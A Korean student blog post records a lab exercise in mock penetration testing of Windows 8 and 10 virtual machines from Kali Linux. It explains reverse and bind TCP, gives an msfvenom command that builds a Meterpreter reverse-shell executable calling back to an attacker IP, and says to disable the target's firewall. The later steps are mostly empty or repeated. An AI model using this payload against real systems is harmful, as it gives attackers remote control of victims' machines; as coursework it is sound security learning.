[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8/μœˆλ„μš°10 OS 침투 μž‘μ—…

2024. 3. 5. 16:45·🚨 λ³΄μ•ˆ 싀무/λͺ¨μ˜ ν•΄ν‚Ή
728x90
λ°˜μ‘ν˜•

! 이 포슀트의 λ‚΄μš©μ€ 전곡 κ°•μ˜μ—μ„œ 닀룬 λ¦¬λˆ…μŠ€ λ³΄μ•ˆ μ‹€μŠ΅μ˜ 기둝용이며, μ΄λŠ” ν•™μŠ΅ λͺ©μ μœΌλ‘œλ§Œ μ‚¬μš©λ˜μ–΄μ•Ό ν•©λ‹ˆλ‹€.

! μ–΄λ– ν•œ κ²½μš°μ—λ„ μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ•…μš©ν•˜κ±°λ‚˜ λΆˆλ²•μ μΈ ν™œλ™μ— μ‚¬μš©ν•΄μ„œλŠ” μ•ˆ λ©λ‹ˆλ‹€.

 

! λͺ¨μ˜ ν•΄ν‚Ήκ³Ό κ΄€λ ¨λœ μ‹€μŠ΅μ€ 합법적인 ν™˜κ²½μ—μ„œλ§Œ μˆ˜ν–‰λ˜μ–΄μ•Ό ν•˜λ©°, λ¬΄λ‹¨μœΌλ‘œ λ‹€λ₯Έ μ‚¬λžŒμ˜ μ‹œμŠ€ν…œμ— μ ‘κ·Όν•˜λŠ” λ“±μ˜ ν–‰μœ„λŠ” 법적인 문제둜 μ΄μ–΄μ§ˆ 수 μžˆμŠ΅λ‹ˆλ‹€. μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ‚¬μš©ν•  λ•Œμ—λŠ” 항상 윀리적인 μ±…μž„μ„ κ°–κ³  행동해야 ν•©λ‹ˆλ‹€.

 

 


 

πŸ“ μ‹€μŠ΅ μ „ μš©μ–΄ 정리 

  · Reverse TCP

   - (μ—°κ²° μ‹œμž‘ 주체) 곡격 λŒ€μƒ μ‹œμŠ€ν…œμ΄ 연결을 μ‹œμž‘

   - (μ—°κ²° λ°©ν–₯) κ³΅κ²©μžλŠ” Meterpreterλ₯Ό μ‹€ν–‰ν•˜λŠ” λ™μ•ˆ μžμ‹ μ˜ μ‹œμŠ€ν…œμ—μ„œ 연결을 λŒ€κΈ°

 

  · Bind TCP

   - (μ—°κ²° μ‹œμž‘ 주체) κ³΅κ²©μžκ°€ 연결을 μ‹œμž‘

   - (μ—°κ²° λ°©ν–₯) 곡격자의 μ‹œμŠ€ν…œμ—μ„œ 곡격 λŒ€μƒ μ‹œμŠ€ν…œμœΌλ‘œμ˜ μ—°κ²°

 


  •  μ‹€μŠ΅ ν™˜κ²½
    • (가상 ν™˜κ²½ VMware Workstation
    • (곡격자 PC) Kali Linux
    • (곡격 λŒ€μƒ PC) Windows 8

01. reverse μ•…μ„±μ½”λ“œλ₯Ό μ‚¬μš©ν•œ windows 8 ν•΄ν‚Ή

  01-01. 곡격자 PC ν™˜κ²½μ„€μ •


  01-02. msfvenom λͺ…λ Ήμ–΄λ‘œ μ•…μ„±μ½”λ“œ 파일 생성

    - reverse μ•…μ„±μ½”λ“œ 파일 생성

~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[곡격자 IP] -f exe -o [파일 이름.exe]

 

  * 이 λͺ…령은 Meterpreterλ₯Ό μ‚¬μš©ν•˜μ—¬  Windows μ‹œμŠ€ν…œμ˜ 64λΉ„νŠΈ μ•„ν‚€ν…μ²˜λ₯Ό λŒ€μƒμœΌλ‘œ ν•˜λŠ” reverse TCP 연결을 μ„€μ •ν•˜λŠ” νŽ˜μ΄λ‘œλ“œλ₯Ό μƒμ„±ν•˜κ³ , ν•΄λ‹Ή νŽ˜μ΄λ‘œλ“œλ₯Ό μ‹€ν–‰ κ°€λŠ₯ν•œ 파일둜 μ €μž₯ν•œλ‹€. 이 νŒŒμΌμ€ κ³΅κ²©μžκ°€ μ„€μ •ν•œ LHOST(곡격자 IP)λ‘œλΆ€ν„° Meterpreter 셸에 μ ‘κ·Όν•˜κΈ° μœ„ν•΄ μ‚¬μš©λ  수 μžˆλ‹€.

 

  λͺ…λ Ήμ–΄ 각 μ˜΅μ…˜μ˜ 역할은 λ‹€μŒκ³Ό κ°™λ‹€.

 

  ' -p windows/x64/meterpreter/reverse_tcp '

    - 이 μ˜΅μ…˜μ€ μƒμ„±ν•˜λ ¨λŠ” νŽ˜μ΄λ‘œλ“œμ˜ μœ ν˜•μ„ μ§€μ •

    - μ—¬κΈ°μ„œλŠ” Meterprter 셸을 μ‚¬μš©ν•˜μ—¬ Windows μ‹œμŠ€ν…œμ— λŒ€ν•œ reverse TCP 연결을 μ„€μ •ν•˜λŠ” νŽ˜μ΄λ‘œλ“œλ₯Ό μƒμ„±ν•˜λ €λŠ” κ²ƒμž„

  ' LHOST=[곡격자  IP] '

    - 이 μ˜΅μ…˜μ€ κ³΅κ²©μžκ°€ 연결을 κΈ°λ‹€λ¦¬λŠ” IP μ£Όμ†Œλ₯Ό μ§€μ •

    - μ—¬κΈ°μ„œλŠ” Meterpreterκ°€ μ—°κ²°λ˜κΈ° μœ„ν•΄ 곡격 λŒ€μƒ μ‹œμŠ€ν…œμ΄ μ—°κ²°ν•΄μ•Ό ν•˜λŠ” IP μ£Όμ†Œ, 즉 곡격자 IP μ£Όμ†Œλ₯Ό μ œκ³΅ν•΄μ•Ό 함

  ' -f exe '

    - 이 μ˜΅μ…˜μ€ μƒμ„±λœ 파일의 ν˜•μ‹μ„ μ§€μ •

    - μ—¬κΈ°μ„œλŠ” μ‹€ν–‰κ°€λŠ₯ν•œ Windows μ‘μš© ν”„λ‘œκ·Έλž¨(.exe)파일 ν˜•μ‹μ„ 선택함

  ' -o [파일 이름.exe] '

    - 이 μ˜΅μ…˜μ€ μƒμ„±λœ νŽ˜μ΄λ‘œλ“œ 파일의 이름과 경둜λ₯Ό μ§€μ •

 

~# dpkg --add-archit3cture i386
~# apt-get update
~# apt-get install wine32

 

  * 이 λͺ…령은 Linux μ‹œμŠ€ν…œμ—μ„œ Wine을 μ„€μΉ˜ν•˜κΈ° μœ„ν•œ 단계이닀. Wine은 Linux 및 λ‹€λ₯Έ μœ λ‹‰μŠ€ 계열 운영 μ²΄μ œμ—μ„œ Windows μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•  수 μžˆγ„±λ° ν•΄μ£ΌλŠ” ν˜Έν™˜μ„± 계측이닀. 

 

  μ•„λž˜λŠ” 각 λͺ…λ Ήμ–΄μ˜ μ„€λͺ…이닀.

 

  ' dpkg --add-architecture i386 '

    - 이 λͺ…λ Ήμ–΄λŠ” μ‹œμŠ€ν…œ μ•„ν‚€ν…μ²˜μ— i386 μ•„ν‚€ν…μ²˜λ₯Ό μΆ”κ°€

    - 이것은 32 λΉ„νŠΈ μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•˜κΈ° μœ„ν•΄ ν•„μš”ν•œ 32 λΉ„νŠΈ 라이브러리λ₯Ό μ„€μΉ˜ν•˜λŠ” 데 도움이 됨

    

  ' apt-get update '

    - νŒ¨ν‚€μ§€ μ—…λ°μ΄νŠΈ

 

  ' apt-get install wine32 '

    - Wine의 32 λΉ„νŠΈ 버전 μ„€μΉ˜

    - μœ„μ—μ„œ μΆ”κ°€ν•œ i386 μ•„ν‚€ν…μ²˜λ₯Ό 기반으둜 Wine을 μ„€μΉ˜ν•˜κΈ° λ•Œλ¬Έμ— 32λΉ„νŠΈ Windows μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•  수 있게 함

 

 

 


02. reverse μ•…μ„±μ½”λ“œλ₯Ό μ‚¬μš©ν•œ windows 10 ν•΄ν‚Ή

  02-01. 곡격 λŒ€μƒ PC ν™˜κ²½μ„€μ •

    - μœˆλ„μš° 10 λ°©ν™”λ²½ λͺ¨λ‘ 끄기


  02-02. msfvenom λͺ…λ Ήμ–΄λ‘œ μ•…μ„±μ½”λ“œ 파일 생성

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성


  02-03. Metasploit μ‚¬μš©ν•˜μ—¬ reverse 곡격 λͺ…λ Ήμ–΄ μ‹€ν–‰

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성


  02-04. Windowsμ—μ„œ μ•…μ„±μ½”λ“œ 파일 μ‹€ν–‰ ν›„ 곡격 μˆ˜ν–‰

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성

 

728x90
λ°˜μ‘ν˜•

'🚨 λ³΄μ•ˆ 싀무 > λͺ¨μ˜ ν•΄ν‚Ή' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

[λͺ¨μ˜ν•΄ν‚Ή] μœ λ‹‰μŠ€/λ¦¬λˆ…μŠ€ 기반의 운영체제 침투  (0) 2025.02.06
[λͺ¨μ˜ ν•΄ν‚Ή] Metasploitable을 μ΄μš©ν•œ 무차별 λŒ€μž… 곡격  (0) 2024.06.03
[λͺ¨μ˜ ν•΄ν‚Ή] 버퍼 μ˜€λ²„ν”Œλ‘œμš° 곡격 μ‹€μŠ΅  (0) 2024.06.03
[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8 μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œ μ‹€ν–‰  (0) 2024.03.05
[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°7 OS 침투 μž‘μ—…  (1) 2024.03.05
'🚨 λ³΄μ•ˆ 싀무/λͺ¨μ˜ ν•΄ν‚Ή' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€
  • [λͺ¨μ˜ ν•΄ν‚Ή] Metasploitable을 μ΄μš©ν•œ 무차별 λŒ€μž… 곡격
  • [λͺ¨μ˜ ν•΄ν‚Ή] 버퍼 μ˜€λ²„ν”Œλ‘œμš° 곡격 μ‹€μŠ΅
  • [λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8 μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œ μ‹€ν–‰
  • [λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°7 OS 침투 μž‘μ—…
WISHee
WISHee
IT와 λ³΄μ•ˆμ— λŒ€ν•œ 곡뢀 기둝을 차곑차곑 μŒ“μ•„κ°€λŠ” 기술 λΈ”λ‘œκ·Έ πŸ›‘οΈπŸ’»
  • WISHee
    DevwithWish
    WISHee
  • 전체
    였늘
    μ–΄μ œ
    • 🌳 ROOT (128)
      • ⛓️ λ„€νŠΈμ›Œν¬ λ³΄μ•ˆ (10)
        • κΈ°λ³Έ κ°œλ… (9)
        • νŒ¨ν‚· 뢄석 (1)
        • μΉ¨μž… 탐지 및 λ°©μ§€ (0)
      • βš™οΈ μ‹œμŠ€ν…œ λ³΄μ•ˆ (0)
        • 운영체제 λ³΄μ•ˆ (0)
        • 취약점 뢄석 (0)
        • 둜그 뢄석 (0)
      • 🌐 μ›Ή λ³΄μ•ˆ (1)
        • OWASP TOP 10 (1)
        • μ›Ή μ„œλ²„ λ³΄μ•ˆ (0)
        • μ›Ή 취약점 뢄석 (0)
      • ☁️ ν΄λΌμš°λ“œ λ³΄μ•ˆ (3)
        • AWS (3)
      • πŸ” μ•”ν˜Έν™” & 인증 (3)
        • μ•”ν˜Έν™” κ°œλ… (2)
        • TLS,SSL (0)
        • 인증 & μ ‘κ·Όμ œμ–΄ (1)
      • 🚨 λ³΄μ•ˆ 싀무 (30)
        • λ³΄μ•ˆ κ΄€μ œ (14)
        • λͺ¨μ˜ ν•΄ν‚Ή (12)
        • 취약점 진단 (3)
        • λ””μ§€ν„Έν¬λ Œμ‹ (1)
      • πŸ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P 인증 (2)
      • πŸ“° λ³΄μ•ˆ λ‰΄μŠ€ & νŠΈλ Œλ“œ (1)
        • μ΅œμ‹  λ³΄μ•ˆ 이슈 (1)
        • 사이버 μœ„ν˜‘ 정보 (0)
        • λ³΄μ•ˆ 컨퍼런슀 리뷰 (0)
      • πŸ”₯ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • 과제 (4)
        • λͺ¨λ“ˆ ν”„λ‘œμ νŠΈ (8)
        • μ΅œμ’… ν”„λ‘œμ νŠΈ (0)
      • πŸ—‚οΈ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • 🧩 Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
      • πŸ‘₯ 버전관리 & ν˜‘μ—…λ„κ΅¬ (9)
        • Git, GitHub (4)
        • etc (5)
      • πŸ’œ 일상 (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • λΈ”λ‘œκ·Έ 메뉴

    • ν™ˆ
    • νƒœκ·Έ
    • λ°©λͺ…둝
  • 링크

    • GitHub
  • 곡지사항

    • λ°˜κ°‘μŠ΅λ‹ˆλ‹€!
  • 인기 κΈ€

  • νƒœκ·Έ

    νŒŒλ¦¬μ—¬ν–‰
    λ¦¬λˆ…μŠ€λ³΄μ•ˆ
    VSCode
    μ •λ³΄λ³΄μ•ˆ
    λͺ½μƒλ―Έμ…Έ
    와이어샀크
    λ³΄μ•ˆμ‹€μŠ΅
    μœ λŸ½μ—¬ν–‰
    ν”„λ‘œκ·Έλž˜λ¨ΈμŠ€
    λͺ¨μ˜ν•΄ν‚Ή
    skμ‰΄λ”μŠ€λ£¨ν‚€μ¦ˆ
    Python
    flask
    ν•œλ‹¬μ—¬ν–‰
    μœˆλ„μš°λ³΄μ•ˆ
    λŸ°λ˜μ—¬ν–‰
    μ½”λ”©ν…ŒμŠ€νŠΈ
    Github
    λΈ”λ‘μ²΄μΈμ‹€μŠ΅
    ν˜‘μ—…λ„κ΅¬
    μΉΌλ¦¬λ¦¬λˆ…μŠ€
    ν•΄μ™Έμ—¬ν–‰
    ν”„λž‘μŠ€μ—¬ν–‰
    μœ λŸ½ν•œλ‹¬μ—¬ν–‰
    μ˜Ήν”Œλ’°λ₯΄
    ν”ŒλΌμŠ€ν¬
    파이썬
    git
    κΉƒν—ˆλΈŒ
    slack
  • 졜근 λŒ“κΈ€

  • 졜근 κΈ€

  • 160x600
    250x250
  • hELLOΒ· Designed Byμ •μƒμš°.v4.10.3
WISHee
[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8/μœˆλ„μš°10 OS 침투 μž‘μ—…
μƒλ‹¨μœΌλ‘œ

ν‹°μŠ€ν† λ¦¬νˆ΄λ°”